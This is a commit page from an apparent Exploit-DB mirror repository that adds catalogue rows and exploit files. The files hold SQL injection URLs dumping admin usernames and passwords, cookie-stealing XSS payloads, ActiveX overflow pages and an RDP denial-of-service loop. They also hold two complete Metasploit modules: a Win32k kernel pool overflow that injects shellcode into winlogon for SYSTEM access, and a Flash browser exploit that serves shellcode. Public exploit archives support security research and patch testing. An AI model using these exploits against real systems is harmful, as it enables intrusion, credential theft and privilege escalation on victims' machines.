bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 05_08_2014

Browse source
This commit is contained in:
Offensive Security 2014-05-08 04:36:22 +00:00
parent 0808f90f6a
commit 12a6febe09
14 changed files with 2615 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

13
files.csv
View file

@ -29940,3 +29940,16 @@ id,file,description,date,author,platform,type,port
33209,platforms/jsp/webapps/33209.txt,"Adobe RoboHelp Server 8 Authentication Bypass Vulnerability",2009-09-03,Intevydis,jsp,webapps,0
33210,platforms/multiple/remote/33210.txt,"HP Operations Manager Default Manager 8.1 Account Remote Security Vulnerability",2009-09-03,Intevydis,multiple,remote,0
33211,platforms/multiple/remote/33211.txt,"HP Operations Dashboard 2.1 Portal Default Manager Account Remote Security Vulnerability",2009-09-03,Intevydis,multiple,remote,0
33212,platforms/windows/remote/33212.rb,"Adobe Flash Player Integer Underflow Remote Code Execution",2014-05-06,metasploit,windows,remote,0
33213,platforms/windows/local/33213.rb,"Windows NTUserMessageCall Win32k Kernel Pool Overflow (Schlamperei)",2014-05-06,metasploit,windows,local,0
33214,platforms/php/webapps/33214.txt,"DvBBS 2.0 'boardrule.php' SQL Injection Vulnerability",2009-09-04,Securitylab.ir,php,webapps,0
33215,platforms/multiple/remote/33215.txt,"IBM Tivoli Identity Manager 5.0.5 User Profile HTML Injection Vulnerability",2009-08-26,IBM,multiple,remote,0
33216,platforms/hardware/dos/33216.txt,"Check Point Endpoint Security Full Disk Encryption RDP Connection Denial of Service Vulnerability",2009-09-09,"Tim Medin",hardware,dos,0
33217,platforms/php/webapps/33217.txt,"Joomla! 'com_pressrelease' Component 'id' Parameter SQL Injection Vulnerability",2009-09-10,Moudi,php,webapps,0
33218,platforms/php/webapps/33218.txt,"Joomla! 'com_mediaalert' Component 'id' Parameter SQL Injection Vulnerability",2009-09-11,Moudi,php,webapps,0
33219,platforms/php/webapps/33219.txt,"Planet 2.0 HTML Injection Vulnerability",2009-09-11,"Steve Kemp",php,webapps,0
33220,platforms/windows/dos/33220.txt,"FileCOPA FTP Server 5.01 'NOOP' Command Denial Of Service Vulnerability",2009-09-15,"Asheesh kumar Mani Tripathi",windows,dos,0
33221,platforms/windows/dos/33221.html,"Novell GroupWise Client 7.0.3.1294 'gxmim1.dll' ActiveX Control Buffer Overflow Vulnerability",2009-09-15,"Francis Provencher",windows,dos,0
33225,platforms/windows/dos/33225.html,"EasyMail Objects 6.0.2.0 'emimap4.dll' ActiveX Control Remote Code Execution Vulnerability",2009-09-15,"Francis Provencher",windows,dos,0
33226,platforms/php/webapps/33226.txt,"Mega File Hosting Script 1.2 'emaillinks.php' Cross Site Scripting Vulnerability",2009-09-16,Moudi,php,webapps,0
33227,platforms/php/webapps/33227.txt,"TuttoPHP Morris Guestbook 'view.php' Cross Site Scripting Vulnerability",2009-09-16,Moudi,php,webapps,0

Can't render this file because it is too large.

11
platforms/hardware/dos/33216.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/36315/info
Check Point Software Endpoint Security Full Disk Encryption for Microsoft Windows is prone to a remote denial-of-service vulnerability.
Exploiting this issue will allow attackers to crash the affected computer, denying service to legitimate users.
NOTE: This BID was originally titled 'Microsoft Windows RDP Connection Denial of Service Vulnerability' based on preliminary reports. It has been updated to properly reflect the underlying issue.
The following example is available:
for /L %i in (1,1,20) do mstsc /v:127.0.0.%i

11
platforms/multiple/remote/33215.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/36293/info
IBM Tivoli Identity Manager is prone to an HTML-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content.
Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
IBM Tivoli Identity Manager 5.0.0.5 is vulnerable; other versions may also be affected.
The following example input was provided:
<script>alert("bbbbb")</script>

9
platforms/php/webapps/33214.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/36282/info
DvBBS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
DvBBS 2.0 is vulnerable; other versions may also be affected.
http://www.example.com/[Path]/boardrule.php?groupboardid=1/**/union/**/select/**/concat(0xBAF3CCA8D3C3BBA7C3FBA3BA,username,0x202020C3DCC2EBA3BA,password)/**/from%20dv_admin%20where%20id%20between%201%20and%204/**/

7
platforms/php/webapps/33217.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/36351/info
The 'com_pressrelease' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/index.php?option=com_pressrelease&id=null+union+select+1,2,version%28%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--

8
platforms/php/webapps/33218.txt Executable file
View file

@ -0,0 +1,8 @@
source: http://www.securityfocus.com/bid/36356/info
The 'com_mediaalert' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/index.php?option=com_mediaalert&id=null+union+select+1,2,version%28%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--

11
platforms/php/webapps/33219.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/36392/info
Planet is prone to an HTML-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content.
Attacker-supplied HTML and script code would run in the context of the affected website, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user.
Planet 2.0 is affected; other versions may also be vulnerable.
The following example code is available:
<img src="javascript:alert(1);" >

9
platforms/php/webapps/33226.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/36413/info
Mega File Hosting Script is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Mega File Hosting Script 1.2 is vulnerable; other versions may also be affected.
http://www.example.com/emaillinks.php?moudi=1"><script>alert(document.cookie);</script>

7
platforms/php/webapps/33227.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/36415/info
Morris Guestbook is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/view.php?pagina=1"><script>alert(document.cookie);</script>

2221
platforms/windows/dos/33220.txt Executable file
View file

File diff suppressed because it is too large Load diff

27
platforms/windows/dos/33221.html Executable file
View file

@ -0,0 +1,27 @@
source: http://www.securityfocus.com/bid/36398/info
Novell GroupWise Client is prone to an unspecified buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data.
Successful exploits allow remote attackers to execute arbitrary code in the context of the application using the ActiveX control (typically Internet Explorer). Failed exploit attempts will likely result in denial-of-service conditions.
Novell GroupWise Client 7.0.3.1294 is vulnerable; other versions may also be affected.
<html>
<object classid='clsid:9796BED2-C1CF-11D2-9384-0008C7396667' id='GWComposeCtl'>
</object>
<script language='vbscript'>
argCount = 1
arg1="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAA"
GWComposeCtl.SetFontFace arg1
</script>

10
platforms/windows/dos/33225.html Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/36409/info
EasyMail Objects ActiveX control is prone to a remote code-execution vulnerability because the application fails to properly sanitize user-supplied data.
Successfully exploiting this issue allows remote attackers to execute arbitrary code in the context of the application (typically Internet Explorer) using the ActiveX control. Failed exploit attempts likely result in denial-of-service conditions.
EasyMail Objects 6.0.2.0 is vulnerable; other versions may also be affected.
Spam Inspector 4.0.354 is vulnerable.
<HTML> <object classid='clsid:0CEA3FB1-7F88-4803-AA8E-AD021566955D' id='target'></object> <script language = 'vbscript'> Scrap = unescape("http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA") code = Scrap target.LicenseKey = code </script> <html>

139
platforms/windows/local/33213.rb Executable file
View file

@ -0,0 +1,139 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/post/windows/reflective_dll_injection'
require 'rex'
class Metasploit3 < Msf::Exploit::Local
Rank = GreatRanking
include Msf::Post::File
include Msf::Post::Windows::Priv
include Msf::Post::Windows::Process
include Msf::Post::Windows::FileInfo
include Msf::Post::Windows::ReflectiveDLLInjection
def initialize(info={})
super(update_info(info, {
'Name' => 'Windows NTUserMessageCall Win32k Kernel Pool Overflow (Schlamperei)',
'Description' => %q{
A kernel pool overflow in Win32k which allows local privilege escalation.
The kernel shellcode nulls the ACL for the winlogon.exe process (a SYSTEM process).
This allows any unprivileged process to freely migrate to winlogon.exe, achieving
privilege escalation. Used in pwn2own 2013 by MWR to break out of chrome's sandbox.
NOTE: when you exit the meterpreter session, winlogon.exe is likely to crash.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Nils', #Original Exploit
'Jon', #Original Exploit
'Donato Capitella <donato.capitella[at]mwrinfosecurity.com>', # Metasploit Conversion
'Ben Campbell <ben.campbell[at]mwrinfosecurity.com>' # Help and Encouragement ;)
],
'Arch' => ARCH_X86,
'Platform' => 'win',
'SessionTypes' => [ 'meterpreter' ],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Targets' =>
[
[ 'Windows 7 SP0/SP1', { } ]
],
'Payload' =>
{
'Space' => 4096,
'DisableNops' => true
},
'References' =>
[
[ 'CVE', '2013-1300' ],
[ 'MSB', 'MS13-053' ],
[ 'URL', 'https://labs.mwrinfosecurity.com/blog/2013/09/06/mwr-labs-pwn2own-2013-write-up---kernel-exploit/' ]
],
'DisclosureDate' => 'Dec 01 2013',
'DefaultTarget' => 0
}))
end
def check
os = sysinfo["OS"]
unless (os =~ /windows/i)
return Exploit::CheckCode::Unknown
end
file_path = expand_path("%windir%") << "\\system32\\win32k.sys"
major, minor, build, revision, branch = file_version(file_path)
vprint_status("win32k.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}")
case build
when 7600
return Exploit::CheckCode::Vulnerable
when 7601
if branch == 18
return Exploit::CheckCode::Vulnerable if revision < 18176
else
return Exploit::CheckCode::Vulnerable if revision < 22348
end
end
return Exploit::CheckCode::Unknown
end
def exploit
if is_system?
fail_with(Exploit::Failure::None, 'Session is already elevated')
end
if sysinfo["Architecture"] =~ /wow64/i
fail_with(Failure::NoTarget, "Running against WOW64 is not supported")
elsif sysinfo["Architecture"] =~ /x64/
fail_with(Failure::NoTarget, "Running against 64-bit systems is not supported")
end
unless check == Exploit::CheckCode::Vulnerable
fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system")
end
print_status("Launching notepad to host the exploit...")
notepad_process_pid = cmd_exec_get_pid("notepad.exe")
begin
process = client.sys.process.open(notepad_process_pid, PROCESS_ALL_ACCESS)
print_good("Process #{process.pid} launched.")
rescue Rex::Post::Meterpreter::RequestError
print_status("Operation failed. Hosting exploit in the current process...")
process = client.sys.process.open
end
print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
library_path = ::File.join(Msf::Config.data_directory, "exploits", "cve-2013-1300", "schlamperei.x86.dll")
library_path = ::File.expand_path(library_path)
print_status("Injecting exploit into #{process.pid}...")
exploit_mem, offset = inject_dll_into_process(process, library_path)
thread = process.thread.create(exploit_mem + offset)
client.railgun.kernel32.WaitForSingleObject(thread.handle, 5000)
client.sys.process.each_process do |p|
if p['name'] == "winlogon.exe"
winlogon_pid = p['pid']
print_status("Found winlogon.exe with PID #{winlogon_pid}")
if execute_shellcode(payload.encoded, nil, winlogon_pid)
print_good("Everything seems to have worked, cross your fingers and wait for a SYSTEM shell")
else
print_error("Failed to start payload thread")
end
break
end
end
end
end

132
platforms/windows/remote/33212.rb Executable file
View file

@ -0,0 +1,132 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::BrowserExploitServer
def initialize(info={})
super(update_info(info,
'Name' => "Adobe Flash Player Integer Underflow Remote Code Execution",
'Description' => %q{
This module exploits a vulnerability found in the ActiveX component of Adobe Flash Player
before 12.0.0.43. By supplying a specially crafted swf file it is possible to trigger an
integer underflow in several avm2 instructions, which can be turned into remote code
execution under the context of the user, as exploited in the wild in February 2014. This
module has been tested successfully with Adobe Flash Player 11.7.700.202 on Windows XP
SP3, Windows 7 SP1 and Adobe Flash Player 11.3.372.94 on Windows 8 even when it includes
rop chains for several Flash 11 versions, as exploited in the wild.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Unknown', # vulnerability discovery and exploit in the wild
'juan vazquez' # msf module
],
'References' =>
[
[ 'CVE', '2014-0497' ],
[ 'OSVDB', '102849' ],
[ 'BID', '65327' ],
[ 'URL', 'http://helpx.adobe.com/security/products/flash-player/apsb14-04.html' ],
[ 'URL', 'http://blogs.technet.com/b/mmpc/archive/2014/02/17/a-journey-to-cve-2014-0497-exploit.aspx' ],
[ 'URL', 'http://blog.vulnhunt.com/index.php/2014/02/20/cve-2014-0497_analysis/' ]
],
'Payload' =>
{
'Space' => 1024,
'DisableNops' => true
},
'DefaultOptions' =>
{
'InitialAutoRunScript' => 'migrate -f',
'Retries' => false
},
'Platform' => 'win',
# Versions targeted in the wild:
# [*] Windows 8:
# 11,3,372,94, 11,3,375,10, 11,3,376,12, 11,3,377,15, 11,3,378,5, 11,3,379,14
# 11,6,602,167, 11,6,602,171 ,11,6,602,180
# 11,7,700,169, 11,7,700,202, 11,7,700,224
# [*] Before windows 8:
# 11,0,1,152,
# 11,1,102,55, 11,1,102,62, 11,1,102,63
# 11,2,202,228, 11,2,202,233, 11,2,202,235
# 11,3,300,257, 11,3,300,273
# 11,4,402,278
# 11,5,502,110, 11,5,502,135, 11,5,502,146, 11,5,502,149
# 11,6,602,168, 11,6,602,171, 11,6,602,180
# 11,7,700,169, 11,7,700,202
# 11,8,800,97, 11,8,800,50
'BrowserRequirements' =>
{
:source => /script|headers/i,
:clsid => "{D27CDB6E-AE6D-11cf-96B8-444553540000}",
:method => "LoadMovie",
:os_name => Msf::OperatingSystems::WINDOWS,
:ua_name => Msf::HttpClients::IE,
:flash => lambda { |ver| ver =~ /^11\./ }
},
'Targets' =>
[
[ 'Automatic', {} ]
],
'Privileged' => false,
'DisclosureDate' => "Feb 5 2014",
'DefaultTarget' => 0))
end
def exploit
@swf = create_swf
super
end
def on_request_exploit(cli, request, target_info)
print_status("Request: #{request.uri}")
if request.uri =~ /\.swf$/
print_status("Sending SWF...")
send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Pragma' => 'no-cache'})
return
end
print_status("Sending HTML...")
tag = retrieve_tag(cli, request)
profile = get_profile(tag)
profile[:tried] = false unless profile.nil? # to allow request the swf
send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
end
def exploit_template(cli, target_info)
swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
shellcode = get_payload(cli, target_info).unpack("H*")[0]
html_template = %Q|<html>
<body>
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
<param name="movie" value="<%=swf_random%>" />
<param name="allowScriptAccess" value="always" />
<param name="FlashVars" value="id=<%=shellcode%>" />
<param name="Play" value="true" />
</object>
</body>
</html>
|
return html_template, binding()
end
def create_swf
path = ::File.join( Msf::Config.data_directory, "exploits", "CVE-2014-0497", "Vickers.swf" )
swf = ::File.open(path, 'rb') { |f| swf = f.read }
swf
end
end